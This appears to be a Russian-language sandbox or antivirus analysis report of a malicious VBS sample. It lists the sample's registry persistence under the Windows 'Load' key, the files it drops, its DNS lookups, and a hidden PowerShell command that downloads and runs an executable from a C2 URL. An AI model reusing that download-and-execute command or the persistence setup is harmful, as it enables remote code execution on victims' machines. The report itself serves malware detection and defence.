Техническая информация
- [HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows] 'Load' = 'C:\Users\Public\config.vbs'
- '<SYSTEM32>\wscript.exe' C:\Users\Public\config.vbs
- http://poc.howielab.com/c2/agent/20160324094627 как scannerdriver.exe
- %APPDATA%\microsoft\windows\privacie\index.dat
- %LOCALAPPDATA%\microsoft\windows\history\history.ie5\mshist012023122220231223\index.dat
- C:\users\public\config.txt
- C:\users\public\config.vbs
- C:\users\public\config.txt в C:\users\public\config.vbs
- 'pk#.goog':80
- http://pk#.goog/gsr1/gsr1.crt
- DNS ASK pk#.goog
- DNS ASK po#.##wielab.com
- ClassName: 'Static' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep Bypass -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadFile('http://poc.howielab.com/C2/Agent/20160324094627','ScannerDriver.exe'));Start-Process 'ScannerDriver....' (со скрытым окном)
- '%ProgramFiles%\internet explorer\iexplore.exe' -Embedding